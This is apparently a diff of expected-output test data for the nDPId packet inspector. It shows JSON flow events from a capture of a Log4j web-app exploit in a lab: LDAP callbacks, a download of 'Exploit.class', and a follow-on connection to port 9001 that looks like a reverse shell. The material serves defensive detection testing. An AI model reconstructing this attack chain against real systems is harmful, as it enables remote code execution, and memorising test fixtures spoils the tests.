+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIBgABCAAGBAABAkJ2jzQWrBDuAQAAAAAAAKwQ7go="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 
00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAACAkKsEO4KrBDuCgJCdo80FqwQ7gE="} -00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} 
-01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
-00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} 
